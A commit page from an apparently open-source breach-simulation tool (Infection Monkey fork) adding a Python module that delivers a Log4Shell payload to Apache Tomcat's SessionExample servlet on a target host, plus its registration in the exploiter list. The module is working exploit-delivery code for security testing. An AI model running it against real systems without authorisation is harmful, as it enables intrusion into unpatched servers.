p20319658
/
monkey
forked from p34709852/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Add Apache Tomcat support for Log4Shell exploit

This commit is contained in:
Ilija Lazoroski 2022-01-06 13:56:17 +01:00
parent 0006112e79
commit 79d92afcd4
2 changed files with 23 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/__init__.py
View File

@ -3,7 +3,8 @@ from typing import List
from .exploitable_service import IExploitableService from .exploitable_service import IExploitableService
from .poc_docker import DockerPOCExploit from .poc_docker import DockerPOCExploit
from .solr import SolrExploit from .solr import SolrExploit
from .tomcat import TomcatExploit
def get_log4shell_service_exploiters() -> List[IExploitableService]: def get_log4shell_service_exploiters() -> List[IExploitableService]:
return [DockerPOCExploit(), SolrExploit()] return [DockerPOCExploit(), SolrExploit(), TomcatExploit()]

21
monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py Normal file
View File

@ -0,0 +1,21 @@
from logging import getLogger
import requests
from infection_monkey.exploit.log4shell_utils.service_exploiters import IExploitableService
from infection_monkey.model import VictimHost
logger = getLogger(__name__)
class TomcatExploit(IExploitableService):
service_name = "Apache Tomcat"
@staticmethod
def trigger_exploit(payload: str, host: VictimHost, port: int):
url = f"http://{host.ip_addr}:{port}/examples/servlets/servlet/SessionExample"
payload = {"dataname": "foo", "datavalue": payload}
try:
resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
except requests.ReadTimeout as e:
logger.debug(f"Log4shell request failed {e}")